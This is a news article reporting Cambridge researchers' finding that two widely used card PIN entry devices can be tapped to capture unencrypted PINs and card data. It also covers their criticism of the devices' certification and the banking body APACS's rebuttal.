Researchers at the University of Cambridge’s Computer Laboratory
in the UK have created a furore with their assertion that two
widely deployed PIN entry devices (PEDs) are not as secure as the
banking industry claims. According to the researchers, their
empirical study revealed that the devices, French payment systems
vendor Ingenico’s i3300 and US payment systems vendor VeriFone’s
Dione Xtreme, fail to adequately protect customers’ card details
and PINs.
Researchers Ross Anderson, Saar Drimer and Steven J Murdoch
explained that fraudsters can easily attach to the PED what they
term “a tap” that records PIN and account details as they are
transmitted between the card and the PIN pad. With this
information, fraudsters can create a counterfeit card with no chip
but a correct magnetic strip that can be used in shops in countries
that do not yet use chip and PIN. A fake card can be used to
withdraw cash from ATMs abroad, because the fraudster has the
correct PIN recorded.
“We have successfully demonstrated this attack, on a real
terminal borrowed from a merchant,” said Murdoch. “Criminals are
already using techniques similar to these to defraud British
customers, with losses in one case alone claimed to be in eight
figures.” He added the technical sophistication required to carry
out this attack is low. In addition, the tap would not normally be
visible to customers and in the case of the Ingenico i3300 it could
be totally enclosed by the device.
Not tamper-proof
Notably, the researchers pointed out that though the PEDs are
supposed to be tamper-resistant, they are not. They explained that
the designers of the PEDs they examined failed to stop the simple
attacks and the devices actually have “curiously placed holes and
contacts” that make the tap attacks even easier.
Expanding on their findings, Drimer added: “The vulnerabilities
we found were caused by a series of design errors by the
manufacturers. They can be exploited because Britain’s banks set up
the chip and PIN in an insecure way.” He explained that the Dione
Xtreme and Ingenico i3300 PEDs failed to protect the communication
path that carries the card data from the card to the PIN pad, and
that carries the PIN from the PIN pad back to the card. The absence
of protection results from both of these data exchanges being
unencrypted.

US Tariffs are shifting - will you react or anticipate?
Don’t let policy changes catch you off guard. Stay proactive with real-time data and expert analysis.
By GlobalDataTheir findings call into question the system under which bank
terminals are certified, stressed the researchers. According to
them, Visa and UK payments industry body APACS not found the flaws
they have identified and had certified the two devices as
secure.
The researchers continued that Visa and APACS claimed the
devices were evaluated under the Common Criteria (CC), an
international evaluation scheme administered in the UK by the
Government Communications Headquarters (GCHQ). However, GCHQ had
not heard of the work and claims the devices were never certified
under the CC. Visa and APACS have refused to disclose the
evaluation report, added the researchers.
GCHQ, the UK’s intelligence agency, is charged with, among other
things, securing the country’s critical communications and
information systems. The relevant government bodies of France,
Germany, Netherlands, Spain, and the UK support the CC
certification scheme.
Concluding, Anderson, professor of security engineering at
Cambridge University, said: “The lessons we learned are not limited
to banking. Other fields, from voting machines to electronic
medical record systems, suffer from the same combination of stupid
mistakes, sham evaluations and obstructive authorities. Where the
public are forced to rely on the security of a system, we need
honest security evaluations that are published and subjected to
peer review.”
Disagreement with findings
In its response to the researchers’ findings, APACS stated: “The
evaluation process did not fail. The devices passed at the level of
protection identified in the criteria and against the stated attack
potential.” APACS also disagreed with the researchers’ assertion
that a tap could be easily attached to the PEDs. “This type of
attack requires far greater effort and engineering to execute than
you currently estimate,” stressed APACS.